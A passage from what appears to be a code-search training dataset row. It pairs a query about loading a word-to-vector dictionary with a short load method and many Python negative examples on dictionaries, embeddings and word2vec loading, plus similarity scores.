"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['alpha'] = self.alpha\n retDict['beta'] = self.beta\n retDict['scale'] = self.high-self.low\n retDict['low'] = self.low\n return retDict",
"def __init__(self):\n self.map = {}\n self.vec = []",
"def vec_to_dict(docVec):\n return {dimension:value for dimension, value in enumerate(docVec)}",
"def save_data(self, name, from_attrs=[], **data):\n data[\"data_version\"] = self.data_version\n\n file_opts = {}\n for opt in [\"map_tag\", \"iter_index\", \"bp_opts\", \"extra_tag\"]:\n if opt in data:\n file_opts[opt] = data.pop(opt)\n\n output_file = self.get_filename(name, ext=\".npz\", **file_opts)\n if not output_file:\n return\n\n for attr in from_attrs:\n if hasattr(self, attr):\n data[attr] = getattr(self, attr)\n\n np.savez_compressed(output_file, **data)\n self.log(\"Saved output data to {}\".format(output_file), \"debug\")\n data[\"output_file\"] = output_file\n return data",
"def FTLM_static_iteration(O_dict,E,V,Q_T,beta=0):\n\tnv = E.size\n\n\n\tp = _np.exp(-_np.outer(_np.atleast_1d(beta),E))\n\tc = _np.einsum(\"j,aj,...j->a...\",V[0,:],V,p)\n\n\tr,Q_T = _get_first_lv(iter(Q_T))\n\n\tresults_dict = {}\n\n\tAr_dict = {key:A.dot(r) for key,A in iteritems(O_dict)}\n\n\tfor i,lv in enumerate(Q_T): # nv matvecs\n\t\tfor key,A in iteritems(O_dict):\n\t\t\tif key in results_dict:\n\t\t\t\tresults_dict[key] += _np.squeeze(c[i,...] * _np.vdot(lv,Ar_dict[key]))\n\t\t\telse:\n\t\t\t\tresults_dict[key] = _np.squeeze(c[i,...] * _np.vdot(lv,Ar_dict[key]))\n\n\treturn results_dict,_np.squeeze(c[0,...])",
"def operator_dict(self, index, vars, **kw):\n out = defaultdict(int)\n # Freeze arg1 metadata for caching ncc matrices\n frozen_arg1_basis_meta = freeze_meta(self.args[1].meta)[-1]\n op0 = self.args[0].as_ncc_operator(frozen_arg1_basis_meta, **kw)\n op1 = self.args[1].operator_dict(index, vars, **kw)\n for var in op1:\n out[var] = op0 * op1[var]\n return out",
"def evaluate():\n global dictionary, wv\n count = 0\n # To save the scores by distance and similarity\n scores = np.zeros(6)\n similar = np.zeros(6)\n itr = len(dictionary)\n logging.info('running evaluation for {0} samples'.format(itr))\n for key in dictionary:\n progress = (count / itr) * 100\n d = dictionary[key].split('resource/')\n d = [idx.split()[0].translate(table).lower() for idx in d[1:]]\n try:\n r = np.array(list(map(lambda x: wv.get_vector(x), d)),\n dtype=np.float32)\n except KeyError:\n itr -= 1\n continue\n if np.any(np.isnan(r)):\n itr -= 1\n continue\n else:\n if r.ndim == 2:\n try:\n # Mean of vector containing all word vectors\n # obtained from abstract.\n r = r.mean(axis=0).reshape(1, -1)\n \n # Obtain the vectors for the entity\n mean_vec = mean_encoder(dictionary[key])\n mean_vec = mean_vec.reshape(1, -1) / norm(mean_vec)\n mean_dist_vec = distance_encoder(dictionary[key])\n mean_dist_vec = mean_dist_vec.reshape(1, -1)\n mean_dist_vec = mean_dist_vec / norm(mean_dist_vec)\n title_vec = title_mean(key)\n title_vec = title_vec.reshape(1, -1) / norm(title_vec)\n abstract_vec = abstract_encoder(key)\n abstract_vec = abstract_vec.reshape(1, -1)\n abstract_vec = abstract_vec / norm(abstract_vec)\n random_vec = np.random.randn(100).reshape(1, -1)\n zero_vec = np.zeros(100).reshape(1, -1)\n \n # Score the entity vectors\n scores[0] += norm(r - mean_vec)\n scores[1] += norm(r - mean_dist_vec)\n scores[2] += norm(r - title_vec)\n scores[3] += norm(r - abstract_vec)\n scores[4] += norm(r - random_vec)\n scores[5] += norm(r - zero_vec)\n similar[0] += cosine_similarity(r, mean_vec)\n similar[1] += cosine_similarity(r, mean_dist_vec)\n similar[2] += cosine_similarity(r, title_vec)\n similar[3] += cosine_similarity(r, abstract_vec)\n similar[4] += cosine_similarity(r, random_vec)\n similar[5] += cosine_similarity(r, zero_vec)\n count += 1\n print(count, end='\\r')\n except (ValueError, KeyError) as _:\n itr -= 1\n continue\n else:\n itr -= 1\n continue\n # Normalize the scores to get a better\n # comparison against the baselines.\n scores = scores / norm(scores)\n similar = similar / norm(similar)\n print_summary(scores, similar)",
"def sparameters(**kwargs):\n d = sweep(**kwargs)\n d.pop(\"GC_sweeps.lsf\", \"\")\n d[\"main.lsf\"] = \"\\n\".join([\"GC_init;\", \"GC_S_extraction;\"])\n d[\"GC_S_extraction.lsf\"] = open(\n CONFIG[\"grating_coupler\"] / \"GC_S_extraction.lsf\"\n ).read()\n d[\"GC_setup_fibre.lsf\"] = open(\n CONFIG[\"grating_coupler\"] / \"GC_setup_fibre.lsf\"\n ).read()\n d[\n \"main.py\"\n ] = \"\"\"\n\nimport pathlib\nimport json\nimport lumapi\n\n\ndirpath = pathlib.Path(__file__).parent.absolute()\n\ns = lumapi.FDTD()\ns.cd(str(dirpath))\ns.eval(\"main;\")\n\nd = {k: list(abs(s.getv(k).flatten())) for k in [\"S11\", \"S12\", \"S21\", \"S22\", \"f\"]}\n\nwith open(dirpath / \"GC_sparameters.json\", \"w\") as f:\n f.write(json.dumps(d))\n\n \"\"\"\n return d",
"def getCrowDistDict(self):\n retDict = Distribution.getCrowDistDict(self)\n retDict['lambda'] = self.lambdaVar\n retDict['low'] = self.low\n return retDict",
"def save_vectorizer(self, vectorizer_filepath):\n with open(vectorizer_filepath, \"w\") as fp:\n json.dump(self._vectorizer.to_serializable(), fp)",
"def makeDictionary(self):\n self.dictionary = {}\n for i in range(len(self.movie)):\n if self.movie[i] in self.dictionary:\n vectors = self.dictionary[self.movie[i]]\n vectors[self.user[i]] = self.rating[i]\n self.dictionary[self.movie[i]] = vectors\n else:\n newMovie = dict([(self.user[i], self.rating[i])])\n self.dictionary[self.movie[i]] = newMovie\n return self.dictionary",
"def output_data_definitions(self):\n return {}",
"def createDictionary(dataset):\r\n for columnNumber in range(2, dataset.shape[1]):\r\n print(\"manipulating \", dataset.at[0, columnNumber])\r\n manipulateData(columnNumber, dataset)\r\n return Dictionary",
"def build_Wordv(word2vec_dict, k):\r\n vocab_size = len(word2vec_dict)\r\n word2id_dict = dict()\r\n W = np.zeros(shape=(vocab_size + 1, k))\r\n W[0] = np.zeros(k)\r\n i = 1\r\n for word in word2vec_dict:\r\n # print type(word), ' | ', word\r\n W[i] = word2vec_dict[word]\r\n # print type(W[i]), \" | \", W[i]\r\n word2id_dict[word] = i\r\n i += 1\r\n return W, word2id_dict",
"def create_vectors(list_dict, num_words):\n x = [] # list that will hold data \n\n for d in list_dict:\n # initializing numpy vector\n # it contains 5,000 (number of words) zeros\n temp = np.zeros(num_words, dtype=np.float64)\n for key, val in d.items():\n if key < num_words:\n key -= 1 # indexing in data starts at 1\n temp[key] = 1 # adding word and its frequency to vector \n # temp[key] = val\n x.append(temp) # appends vector to x \n\n return x",
"def codegen_reload_data():\n return {\n \"package\": u\"fn_utilities\",\n \"message_destinations\": [u\"fn_utilities\"],\n \"functions\": [u\"utilities_artifact_hash\", u\"utilities_attachment_hash\", u\"utilities_attachment_to_base64\", u\"utilities_attachment_zip_extract\", u\"utilities_attachment_zip_list\", u\"utilities_base64_to_artifact\", u\"utilities_base64_to_attachment\", u\"utilities_call_rest_api\", u\"utilities_domain_distance\", u\"utilities_email_parse\", u\"utilities_excel_query\", u\"utilities_expand_url\", u\"utilities_extract_ssl_cert_from_url\", u\"utilities_get_contact_info\", u\"utilities_json2html\", u\"utilities_parse_ssl_certificate\", u\"utilities_pdfid\", u\"utilities_resilient_search\", u\"utilities_shell_command\", u\"utilities_string_to_attachment\", u\"utilities_timer\", u\"utilities_xml_transformation\"],\n \"workflows\": [u\"example_artifact_attachment_to_base64\", u\"example_artifact_hash\", u\"example_attachment_hash\", u\"example_attachment_to_base64\", u\"example_call_rest_api\", u\"example_create_artifacts_from_excel_data\", u\"example_domain_distance\", u\"example_email_parsing_artifact\", u\"example_email_parsing_attachment\", u\"example_extract_ssl_cert_from_url\", u\"example_get_incident_contact_info\", u\"example_get_task_contact_info\", u\"example_json2html\", u\"example_parse_ssl_certificate\", u\"example_pdfid\", u\"example_resilient_search\", u\"example_shell_command\", u\"example_string_to_attachment\", u\"example_timer\", u\"example_timer_parallel\", u\"example_xml_transformation\", u\"example_zip_list\", u\"example_zip_to_artifact\", u\"utilities_expand_url\"],\n \"actions\": [u\"Example: (Artifact) Attachment to Base64\", u\"Example: Artifact Hash\", u\"Example: Attachment Hash\", u\"Example: Attachment to Base64\", u\"Example: Call REST API\", u\"Example: Domain Distance\", u\"Example: Email Parsing (Artifact)\", u\"Example: Email Parsing (Attachment)\", u\"Example: Expand URL\", u\"Example: Extract SSL Certificate\", u\"Example: Get Incident Contact Info\", u\"Example: Get Task Contact Info\", u\"Example: JSON2HTML\", u\"Example: Parse SSL Certificate\", u\"Example: PDFiD\", u\"Example: Resilient Search\", u\"Example: Shell Command\", u\"Example: String to Attachment\", u\"Example: Timer Epoch\", u\"Example: Timers in Parallel\", u\"Example: Use Excel Data\", u\"Example: XML Transformation\", u\"Example: Zip Extract\", u\"Example: Zip List\"],\n \"incident_fields\": [],\n \"incident_artifact_types\": [],\n \"incident_types\": [],\n \"datatables\": [],\n \"automatic_tasks\": [],\n \"scripts\": [u\"Convert JSON to rich text v1.0\"],\n \"playbooks\": []\n }",
"def CopyToDict(self):\n return {'labels': self.labels}",
"def get_export_outputs_prediction_dict_smith_de(\n seq_embed_1, seq_embed_2, predicted_score, predicted_class,\n documents_match_labels, input_sent_embed_1, input_sent_embed_2,\n output_sent_embed_1, output_sent_embed_2):\n export_outputs = {\n tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:\n tf_estimator.export.PredictOutput(predicted_score),\n \"seq_embed_1\":\n tf_estimator.export.PredictOutput(seq_embed_1),\n \"seq_embed_2\":\n tf_estimator.export.PredictOutput(seq_embed_2),\n \"input_sent_embed_1\":\n tf_estimator.export.PredictOutput(input_sent_embed_1),\n \"input_sent_embed_2\":\n tf_estimator.export.PredictOutput(input_sent_embed_2),\n \"output_sent_embed_1\":\n tf_estimator.export.PredictOutput(output_sent_embed_1),\n \"output_sent_embed_2\":\n tf_estimator.export.PredictOutput(output_sent_embed_2),\n \"predicted_class\":\n tf_estimator.export.PredictOutput(predicted_class),\n \"documents_match_labels\":\n tf_estimator.export.PredictOutput(documents_match_labels)\n }\n\n prediction_dict = {\n \"predicted_score\": predicted_score,\n \"predicted_class\": predicted_class,\n \"documents_match_labels\": documents_match_labels,\n \"seq_embed_1\": seq_embed_1,\n \"seq_embed_2\": seq_embed_2,\n \"input_sent_embed_1\": input_sent_embed_1,\n \"input_sent_embed_2\": input_sent_embed_2,\n \"output_sent_embed_1\": output_sent_embed_1,\n \"output_sent_embed_2\": output_sent_embed_2\n }\n return (export_outputs, prediction_dict)",
"def main() -> None:\n\n args = get_args()\n\n if not os.path.isdir(args.outdir):\n os.makedirs(args.outdir)\n\n print('Starting export... (--verbose for updates)')\n\n variables = set()\n measurements_file = os.path.join(args.outdir, 'scrutinizer.csv')\n with open(measurements_file, 'wt') as measurements_fh:\n writer = csv.DictWriter(measurements_fh,\n fieldnames=[\n 'source', 'unit', 'variable_name',\n 'location_name', 'location_type', 'value',\n 'collected_on', 'medium', 'variable_desc'\n ],\n quoting=csv.QUOTE_NONNUMERIC)\n writer.writeheader()\n\n for i, m in enumerate(Measurement, start=1):\n if args.verbose:\n print(f'{i:6}: {m.variable.variable} {m.value}')\n\n writer.writerow({\n 'source': m.variable.source.source,\n 'unit': m.variable.unit,\n 'variable_name': m.variable.variable,\n 'variable_desc': m.variable.description,\n 'location_name': str(m.location.location_name),\n 'location_type': m.location.location_type.location_type,\n 'value': m.value,\n 'collected_on': m.collected_on,\n 'medium': m.medium.medium,\n })\n\n variables.add((m.variable.variable, m.variable.description))\n\n variables_file = os.path.join(args.outdir, 'variables.csv')\n with open(variables_file, 'wt') as variables_fh:\n writer = csv.DictWriter(variables_fh, fieldnames=['name', 'desc'])\n writer.writeheader()\n for key, val in dict(variables).items():\n writer.writerow({'name': key, 'desc': val})\n\n print(f'Done, see outdir \"{args.outdir}\".')",
"def _retrieve_solution(self, m):\n result = {} # {component: {resource: production}}\n for comp in m.Components:\n prod = getattr(m, '{n}_production'.format(n=comp.name))\n result[comp.name] = {}\n for res, comp_r in m.resource_index_map[comp].items():\n result[comp.name][res] = np.fromiter((prod[comp_r, t].value for t in m.T), dtype=float, count=len(m.T))\n return result",
"def index_nodes(self):\n out = {}\n\n #avg = np.mean(list(self.rtype_vectors.values()),axis=0)\n\n\n #for name, node in self.nodes.items():\n # tmp1 = [self.rtype_vectors[rtype]\n # for rtype, dest in node.outgoing_relations] or [NULL_VEC()]\n # tmp2 = [permute_rtype_vector(self.rtype_vectors[rtype])\n # for rtype, prev in node.incoming_relations] or [NULL_VEC()]\n\n # net = tmp1 + tmp2\n\n # #out[name] = np.asarray(net).mean(axis=0)\n # #out[name] = np.asarray(net).sum(axis=0)\n # v = np.asarray(net).sum(axis=0)\n # if v.any():\n # out[name] = v/max(v)#softmax(v/max(v))\n # else:\n # out[name] = v\n\n\n #avg = np.mean(list(out.values()),axis=0)\n\n #maxm = np.max(list(out.values()),axis=0)\n\n ####normalize everything\n #for r,v in out.items():\n # if v.any():\n # #out[r] = v / sqrt(v.dot(v))\n # out[r] = softmax((v-avg)/maxm)\n\n\n\n # PCA method 0001701\n rmap = self.rtype_vectors\n data = np.zeros((len(self.nodes), JACCARD_DIMENSIONS), dtype=np.float)\n ix = 0\n for node in self.nodes.values():\n\n #compute weighted average of each relation type\n tmp = [rmap[rtype] for \n rtype, dest in node.outgoing_relations] + \\\n [permute_rtype_vector(rmap[rtype]) for \n rtype, prev in node.incoming_relations]\n\n v = np.asarray(tmp).mean(axis=0) if tmp else NULL_VEC()\n\n #normalize\n if v.any():\n data[ix] = v / sqrt(v.dot(v))\n else:\n data[ix] = v\n ix += 1\n\n #eliminate projection onto first 7 principal components\n d2 = data - PCA(data, 7)\n\n #order of nodes is preserved\n for i,v in enumerate(self.nodes):\n out[v] = softmax(d2[i])\n\n return out",
"def save_class_representation(self):\n class_dict = {}\n for key, value in self.class_dict.items():\n class_dict['-'.join(key)] = list(value)\n with open('data/class_vectors.txt', 'w') as file:\n json.dump(class_dict, file)\n return class_dict",
"def new_counts_dict():\n\n\tIN_FILES = [\"../_semtag_dataset_webanno_tfidf_inimigo.txt\",\"../_semtag_dataset_webanno_tfidf_publico.txt\" ]\n\n\ttxt = []\n\tfor in_file in IN_FILES:\n\t with codecs.open(in_file,\"r\",\"utf-8\") as fid:\n\t txt += fid.readlines()\n\t#words\n\twords = [w for m in txt for w in m.split()]\n\t#unique words\n\twords = list(set(words))\n\t#word index\n\twrd2idx = {w:-1 for w in words}\n\n\tset_trace()\n\t\n\twith open(COUNTS_DIC,\"w\") as fod:\n\t\tcPickle.dump(wrd2idx, fod, cPickle.HIGHEST_PROTOCOL)",
"def write_vectors(self, filename):\n svu.write_realvectors(self,filename)"
] | [
"0.6104261",
"0.6104261",
"0.59266806",
"0.5733242",
"0.567408",
"0.5661961",
"0.5612445",
"0.5592986",
"0.55927783",
"0.549614",
"0.5439975",
"0.5427137",
"0.54063416",
"0.53769064",
"0.5355195",
"0.53128344",
"0.53023034",
"0.52946824",
"0.5286039",
"0.52819043",
"0.5276488",
"0.5270589",
"0.5239066",
"0.52271557",
"0.52040166",
"0.51995933",
"0.51658094",
"0.5133373",
"0.512791",
"0.511702",
"0.5098492",
"0.5089017",
"0.5087816",
"0.5073769",
"0.50725853",
"0.5071858",
"0.5063045",
"0.50591195",
"0.505701",
"0.504759",
"0.50470185",
"0.50396556",
"0.5039108",
"0.50299954",
"0.5022235",
"0.5013165",
"0.5008832",
"0.5002655",
"0.5000345",
"0.49967262",
"0.49888214",
"0.4985091",
"0.49795467",
"0.4974698",
"0.49717835",
"0.49669546",
"0.49640995",
"0.4962136",
"0.4952939",
"0.49514055",
"0.49476412",
"0.4945526",
"0.4941939",
"0.4939378",
"0.49344397",
"0.4932449",
"0.49302596",
"0.4927369",
"0.49263328",
"0.49233678",
"0.49042955",
"0.48983768",
"0.48957658",
"0.48904097",
"0.48892003",
"0.48889345",
"0.4888916",
"0.4885785",
"0.48837376",
"0.48773152",
"0.48757672",
"0.48706177",
"0.48661974",
"0.48640484",
"0.4861954",
"0.48613632",
"0.48543543",
"0.48508796",
"0.48468566",
"0.48455527",
"0.48446858",
"0.48416597",
"0.4833972",
"0.48339003",
"0.48310867",
"0.48302278",
"0.4830133",
"0.48299205",
"0.48292616",
"0.48282084",
"0.48243672"
] | 0.0 | -1 |
Loads word to vector dictionary. If pickle exists, it will use that since it's easiest to load in. | def load(self, dirname=None):
self.genio.load(dirname)
logging.info(f'Loaded word vectorizations at {dirname}') | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def load_vector_dictionary():\n return read_word2vecs_from_file(VECTOR_FILE)",
"def load_word2vec(self, path, binary=True, reserve_zero=True, reserve_oov_token=True):\n self.allow_oov = reserve_oov_token\n self.reserve_zero = reserve_zero\n words = []\n if self.reserve_zero:\n words.append('__ZERO__')\n if self.allow_oov:\n words.append('__OUT_OF_VOCAB__')\n self.oov_index = len(words) - 1\n\n if binary:\n with open(path, 'rb') as f:\n # Get number of vectors and vector size\n # from first line\n num_vectors, vector_size = map(\n int, f.readline().decode('UTF-8').split())\n FLOAT_SIZE = 4\n\n self._matrix = np.zeros(\n [num_vectors + len(words), vector_size], dtype='float32')\n # Assign random vector for OOV token if it exists\n if self.allow_oov:\n self._matrix[self.oov_index] = np.random.randn(vector_size, )\n\n update = words.append # Speedup\n for i in tqdm(range(len(words), num_vectors+len(words))):\n # Reads until a whitespace is found (get a word)\n word = b\"\"\n while True:\n char = f.read(1)\n if char == b\" \":\n break\n word += char\n update(word)\n #Read vector\n vecs = f.read(FLOAT_SIZE * vector_size)\n self._matrix[i] = np.frombuffer(vecs, 'f')\n\n self.vocab = words\n else:\n print(\"This feature is yet to be implemented\")",
"def load(self):\n self.word2vec, self.img2sentence, self.word_freq, self.num_words, self.word2idx, self.idx2word = pickle.load(open(self.save_file, 'rb'))",
"def load_dict(path_to_vec):\n emb = {}\n with open(path_to_vec, 'r', errors='ignore', encoding='utf8') as f:\n for line in f:\n values = line.split()\n word = values[0]\n vector = np.asarray(values[1:], \"float32\")\n emb[word] = vector\n return emb",
"def load_word2vec(path):\n model = gensim.models.KeyedVectors.load_word2vec_format(path, binary=True) \n return model",
"def load_vec(fname, vocab, binary = True):\n print(\" Loading word2vec...\")\n #w2v_cache = \"cache\\\\w2v\"\n #if os.path.isfile(w2v_cache):\n # return cPickle.load(open(w2v_cache,\"rb\"))\n\n mode = (\"rb\" if binary else \"r\")\n word_vecs = {}\n with open(fname, mode) as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = numpy.dtype('float32').itemsize * layer1_size\n\n def getline():\n if binary:\n return numpy.fromstring(f.read(binary_len), dtype='float32')\n else:\n return numpy.array(f.readline().split(), dtype='float32')\n\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = getline()\n else:\n getline()\n print(\" Loaded word2vec...\")\n# cPickle.dump(word_vecs, open(w2v_cache, \"wb\"))\n return word_vecs",
"def load_word_vectors(root, wv_type, dim):\n if isinstance(dim, int):\n dim = str(dim) + 'd'\n fname = os.path.join(root, wv_type + '.' + dim)\n if os.path.isfile(fname + '.pt'):\n fname_pt = fname + '.pt'\n print('loading word vectors from', fname_pt)\n return torch.load(fname_pt)\n if os.path.isfile(fname + '.txt'):\n fname_txt = fname + '.txt'\n print('loading word vectors from', fname_txt)\n cm = open(fname_txt, 'rb')\n elif os.path.basename(wv_type) in URL:\n url = URL[wv_type]\n print('downloading word vectors from {}'.format(url))\n r = requests.get(url, stream=True)\n with zipfile.ZipFile(six.BytesIO(r.content)) as zf:\n print('extracting word vectors into {}'.format(root))\n zf.extractall(root)\n return load_word_vectors(root, wv_type, dim)\n else:\n print('Unable to load word vectors.')\n\n wv_tokens, wv_arr, wv_size = [], array.array('d'), None\n with cm as f:\n for line in f:\n entries = line.strip().split(b' ')\n word, entries = entries[0], entries[1:]\n if wv_size is None:\n wv_size = len(entries)\n try:\n word = word.decode()\n except:\n print('non-UTF8 token', repr(word), 'ignored')\n continue\n wv_arr.extend(float(x) for x in entries)\n wv_tokens.append(word)\n\n wv_dict = {word: i for i, word in enumerate(wv_tokens)}\n wv_arr = torch.Tensor(wv_arr).view(-1, wv_size)\n ret = (wv_dict, wv_arr, wv_size)\n torch.save(ret, fname + '.pt')\n return ret",
"def load(cls, filepath) -> 'Word2VecEmbedding':\n with open(filepath, 'rb') as f:\n embedding = pickle.load(f)\n embedding.word2idx = {spell: idx for idx, spell in enumerate(embedding.vocab.idx2word)}\n return embedding",
"def load_vectors_novocab(path: str) -> (Optional[str], dict):\n print(f\"Started loading vectors from {path} @ {datetime.now()}\")\n words = dict()\n try:\n with open(file=path, mode=\"r\", encoding=\"utf-8\") as source_file:\n # Get the first line. Check if there's only 2 space-separated strings (hints a dimension)\n dimensions = str(next(source_file))\n if len(dimensions.split(\" \")) == 2:\n # We have a dimensions line. Keep it in the variable, continue with the next lines\n pass\n else:\n # We do not have a dimensions line\n line = dimensions.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n dimensions = None\n for line in source_file:\n line = line.split(' ', 1)\n key = line[0]\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n except OSError:\n print(\"Unable to read word vectors, aborting.\")\n return {}\n print(f\"Finished loading a total of {len(words)} vectors @ {datetime.now()}\")\n return dimensions, normalise(words)",
"def load_word2vect(self, file_path):\n self.embeddings = []\n self.word_to_idx = {'<pad>' : 0}\n self.vocab = ['<pad>']\n\n model = w2v.load(file_path)\n self.embedding_size = model.vectors.shape[1]\n pad_embedding = np.zeros(self.embedding_size, \"float32\")\n self.embeddings.append(pad_embedding)\n\n train_words_set = set([word for text in self.train_data for word in\n text[1].split(\" \")])\n\n for w in model.vocab:\n if w in train_words_set:\n self.word_to_idx[w] = len(self.vocab)\n self.vocab.append(w)\n self.embeddings.append(model[w])\n\n del model",
"def get_vector(self, word):\n string = \"SELECT * FROM Vectors WHERE name=?\"\n params = (word,)\n self.cur.execute(string, params)\n raw_vector = self.cur.fetchone()\n if raw_vector is None:\n raise KeyError(\"Vector not found\")\n else:\n vector = pickle.loads(raw_vector[1])\n return vector",
"def get_weibo_data(vocab_file, vector_file):\n if os.path.exists(\"word_misc.pkl\"):\n return cPickle.load(open(\"word_misc.pkl\", \"rb\"))\n\n word_misc, word2id, id2word = {}, {}, {}\n word_count = 0\n\n # vocab file\n print \"Building vocabulary ...\"\n for lines in open(vocab_file).readlines():\n word = lines.split()[0]\n if not is_unwanted_words(word, ['', '\\n']):\n word2id[word] = word_count\n id2word[word_count] = word\n word_count += 1\n word2id['_START'] = word_count\n id2word[word_count] = '_START'\n word_count += 1\n word2id['_END'] = word_count\n id2word[word_count] = '_END'\n word_count += 1\n word2id['_UNK'] = word_count\n id2word[word_count] = '_UNK'\n word_count += 1\n word2id['_MASK'] = word_count\n id2word[word_count] = '_MASK'\n word_count += 1\n print \"Vocabulary size:\", word_count\n\n # Initialization is refered to in https://www.tensorflow.org/versions/r0.7/tutorials/word2vec/index.html\n word_emb = (1/np.sqrt(word_count)*(2*np.random.rand(word_count, options['embedding_size']) - 1)).tolist()\n\n # load word vectors\n for lines in open(vector_file).readlines()[1:]:\n word = lines.split()[0]\n #if word == '</s>' or word not in word2id.keys():\n # continue\n if word not in word2id.keys():\n continue\n ids = word2id[word]\n #print ids, lines, len(word_emb)\n word_emb[ids] = [float(w) for w in lines.split()[1:]]\n\n print len(word_emb), \"words have been loaded with\", len(word_emb[0]), \"dimensions\"\n\n # load word misc\n word_misc['id2word'] = id2word\n word_misc['word2id'] = word2id\n word_misc['word_count'] = word_count\n word_misc['word_emb'] = word_emb\n cPickle.dump(word_misc, open(\"word_misc.pkl\", \"wb\"))\n print \"Dump complete.\"\n return word_misc",
"def load_bin_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32') \n else:\n f.read(binary_len)\n cPickle.dump(word_vecs, open(\"./data/word_vecs.pkl\", \"w\"))\n return word_vecs",
"def load(self, path='dict.pic'):\n with open(path, 'rb') as f:\n self.__dictionary = pickle.load(f)\n self.__vocab_size = len(self.__dictionary)\n\n if self.__verbose:\n print('Loading Tokenizer, vocab size:', self.vocab_size())",
"def load_word2vec_model():\n logging.basicConfig(\n format='%(asctime)s : %(levelname)s : %(message)s', \n level=logging.INFO)\n model_path = '/playpen/home/tongn/GoogleNews-vectors-negative300.bin'\n model = KeyedVectors.load_word2vec_format(fname=model_path, binary=True)\n return model",
"def vocab_from_pickle(path: str) -> Dict:\n with open(path, \"rb\") as inp:\n vocab = pickle.load(inp)\n logger.info('Vocabulary (%d words) loaded from \"%s\"', len(vocab), path)\n return vocab",
"def load_pretrained_vectors(self, emb_file, fixed):\n if emb_file:\n pretrained = torch.load(emb_file)\n self.word_lut.weight.data.copy_(pretrained)\n if fixed:\n self.word_lut.weight.requires_grad = False",
"def load_word_embeddings(self, word_embeddings, word_to_ix):\n logger.info(\"Loading the vocabulary\")\n self.vocab = {}\n self.index2word = []\n counts = {}\n for word in word_to_ix:\n counts[word] = counts.get(word, 0) + 1\n self.vocab_size = len(counts)\n self.vector_size = word_embeddings.shape[1]\n self.vectors = np.zeros((self.vocab_size, self.vector_size))\n self.index2word = [None] * self.vocab_size\n logger.info(\"Corpus has %i words\", len(self.vocab))\n for word_id, word in enumerate(counts):\n self.vocab[word] = Vocab(index=word_id, count=counts[word])\n self.vectors[word_id] = word_embeddings[word_to_ix[word]]\n self.index2word[word_id] = word\n assert((len(self.vocab), self.vector_size) == self.vectors.shape)\n logger.info(\"Loaded matrix of %d size and %d dimensions\", self.vocab_size, self.vector_size)",
"def load_word2vec_embeddings(word2vec_file, word_map):\n # Load word2vec model into memory\n w2v = gensim.models.KeyedVectors.load(word2vec_file, mmap='r')\n\n\n\n # Create tensor to hold embeddings for words that are in-corpus\n # word_map 내 단어들에 대한 임베딩 벡터 만들기\n embeddings = torch.FloatTensor(len(word_map), w2v.vector_size)\n init_embedding(embeddings)\n\n # Read embedding file\n\n for word in word_map:\n if word in w2v.vocab:\n embeddings[word_map[word]] = torch.FloatTensor(w2v[word])\n\n\n return embeddings, w2v.vector_size",
"def load_bin_vec(word2vec, vocab):\n word_vecs = {}\n with open(word2vec, \"rb\") as f:\n header = f.readline()\n vocab_size, layer1_size = map(int, header.split())\n binary_len = np.dtype('float32').itemsize * layer1_size\n for line in xrange(vocab_size):\n word = []\n while True:\n ch = f.read(1)\n if ch == ' ':\n word = ''.join(word)\n break\n if ch != '\\n':\n word.append(ch)\n if word in vocab:\n word_vecs[word] = np.fromstring(f.read(binary_len), dtype='float32')\n else:\n f.read(binary_len)\n return word_vecs",
"def load_glove_vec(fname, vocab):\n word_vecs = {}\n with open(fname, \"rb\") as f:\n for i,line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n if word in vocab:\n word_vecs[word] = np.array(L[1:], dtype='float32')\n return word_vecs",
"def load_embeddings(embeddings_path):\n\n embeddings_index = {}\n f = open(embeddings_path, encoding='utf-8')\n for line in tqdm(f):\n values = line.rstrip().split(' ')\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n f.close()\n print('Found {} word vectors.'.format(len(embeddings_index)))\n return embeddings_index",
"def load_word_index(path):\n word_index = open(path + '/word_index.pickle', 'rb')\n word_index = pickle.load(word_index)\n print('Word Index Pickle load successful\\n')\n return word_index",
"def load_word2vec_format(cls, *args, **kwargs):\n raise NotImplementedError(\"Not supported. Use gensim.models.KeyedVectors.load_word2vec_format instead.\")",
"def load_vectors(path: str, vocabulary: set) -> (Optional[str], dict):\n print(f\"Started loading vectors from {path} @ {datetime.now()}\")\n print(f\"No. of words in vocabulary: {len(vocabulary)}\")\n words = dict()\n try:\n with open(file=path, mode=\"r\", encoding=\"utf-8\") as source_file:\n # Get the first line. Check if there's only 2 space-separated strings (hints a dimension)\n dimensions = str(next(source_file))\n if len(dimensions.split(\" \")) == 2:\n # We have a dimensions line. Keep it in the variable, continue with the next lines\n pass\n else:\n # We do not have a dimensions line\n line = dimensions.split(' ', 1)\n key = line[0]\n if key in vocabulary:\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n dimensions = None\n for line in source_file:\n line = line.split(' ', 1)\n key = line[0]\n if key in vocabulary:\n words[key] = np.fromstring(line[1], dtype=\"float32\", sep=' ')\n except:\n print(\"Unable to read word vectors, aborting.\")\n return None\n print(f\"Finished loading a total of {len(words)} vectors @ {datetime.now()}\")\n return dimensions, normalise(words)",
